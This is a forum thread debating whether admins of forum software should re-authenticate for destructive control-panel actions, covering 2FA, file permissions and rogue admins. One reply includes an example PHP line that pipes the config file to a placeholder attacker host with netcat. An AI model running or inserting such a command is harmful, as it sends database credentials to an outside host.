The administrator should have to re-authenticate whenever they do certain admin actions like deleting a forum, accessing the backups page, etc.
Maybe, guard the command-line tool with a set of credentials too?
Guarding the command line tool doesn't really make much sense IMO when you could just guard access with standard filesystem ACLs and OS permissions.
Like Euan said, I can't see much value in protecting the CLI tool with credentials. You'd need SSH access in the first place to even use it. However your other point about forcing more reauthorizations for actions within the ACP does seem reasonable.
You don't necessarily need SSH access. Remember. PHP can run shell commands. As can other programs.
MySQL is guarded with credentials when you invoke it, with the exception of when you're running a shell command as root, but if an adversary has access to root, then you have bigger problems.
https://en.wikipedia.org/wiki/Confused_deputy_problem
I don't really see the point in this.
If someone gains access to your password then having to type it in again won't stop them.
Suppose went with a verification code sent to a mobile or email...
That would just be a pain in the butt for anyone either trying to set up a new forum if they had to keep getting new codes every time they did an action or every certain amount of time.
Or suppose something bad happened and needed to lock down the board quickly, having to spend extra time waiting for a code to come in, type it in, then do what is necessary just wastes time and increases potential problems.
Also, in response to Euan saying to use file permissions, the more things admins have to secure and the more arcane number they have to deal with, the higher the chances of them making a mistake. They might not even necessarily know how permissions work and are just copying it off Stack Overflow or something.
VirusZero. We already have measures for further securing the ACP like the Admin PIN and Admin 2FA. These help to mitigate the damage caused by security exploits. In a perfect world, security exploits wouldn't exist, but a SQL Injection for instance can cause a lot of damage.
In addition, re-entering your password during particularly destructive tasks like deleting a forum can act as an "Are you sure about this?" and would make it *feel* like a heavy decision. The same argument was used for admins reading PMs in Discourse, with the ability to casually read PMs being contrasted against a screen making them think twice, especially when every PM read is logged.
Gonna have to agree with VirusZero there. I can't see it helping much with security and it sounds like a pain if you're doing a lot of actions.
(2017-12-09, 10:54 PM)Azah Wrote: [ -> ]You don't necessarily need SSH access. Remember. PHP can run shell commands. As can other programs.
MySQL is guarded with credentials when you invoke it
If the attacker can run shell commands with access to the forum directory, I'd say most bets are off. I mean, it's not like they can't just get your DB credentials:
system('cat inc/config.php | nc evil-host');
Admins are human too. One area might have adequate permissions, another may not, who really knows.
But once you're going through 15 different zones which need 15 different sets of permissions, it's easy for someone to slip-up. This is one of MyBB's biggest and most fundamental security flaws, mistakes and misconfigurations are a major source of compromises, although here's hoping that Docker helps with that.
It could be executable and not readable, who really knows. Anything could be anything, it gets more complicated when someone needs to contrast world visibility to group visibility and so on.
And it really depends on how the shell command is being run and how it's mangled. For instance, one idea for 2.0 was to invoke Node to build the Typescript, etc. on the behalf of MyBB as PHP is obviously incapable of running JavaScript. It's not inconceivable that a carefully crafted string could get pass as a valid "filename" despite protections.
I wouldn't put it past there being a Wordpress Plugin or something which does that.
There's always a balance between how secure will this actually make things and how much will it impact the user. What's the point of making things so secure that they need 20 different passwords to do anything if they decide to go elsewhere? Or worse they actively try to circumvent the system. (Like when Vista came out with the UAC, people just clicked yes until it went away.)
And in this case I think having to enter a password or system generated code in won't make things more secure.
As for sql injections/exploits, sure they can be a risk. But there's really no way to perfectly guard against them. Since if they can get something into the system they can often bypass any requirements anyway. Having to enter another code won't matter if they can inject a sql query directly to delete something or add a new root admin account. The extra code in this case only affects users going through the Admin Control Panel, not those who go through the sql itself.
Plus isn't it enough that, say for deleting users, it asks:
"Are you sure you want to do this? (This can't be undone)"
I haven't deleted a forum (I usually just repurpose them) so I wouldn't be surprised if it does the same thing. (Or if not then it wouldn't take that much effort to add that extra step in.) Having that kind of thing for those destructive acts equates to the same thing. But it would not add the inconvenience of having to re-enter a password or a code each time.
Quote:You don't necessarily need SSH access. Remember. PHP can run shell commands.
In which case your idea wouldn't prevent that if they insert a shell script. On my servers I disable functions related to shells in the php.ini.
Quote:But once you're going through 15 different zones which need 15 different sets of permissions, it's easy for someone to slip-up. This is one of MyBB's biggest and most fundamental security flaws, mistakes and misconfigurations are a major source of compromises
I disagree. First, you shouldn't have that many admins. Second, you should be careful what permissions you give them.
A certain level of caution has to be shown by the forum owner in setting Admins. I think what you're asking is overkill and an unneccesary burden to the team.
Any rogue admin can cause the forum a lot of destruction.
Quote:The administrator should have to re-authenticate whenever they do certain admin actions like deleting a forum, accessing the backups page, etc.
What stops the rogue admin from going into the forums and deleting mass threads with just a few clicks? As for the db-backups.php in acp. I just delete it.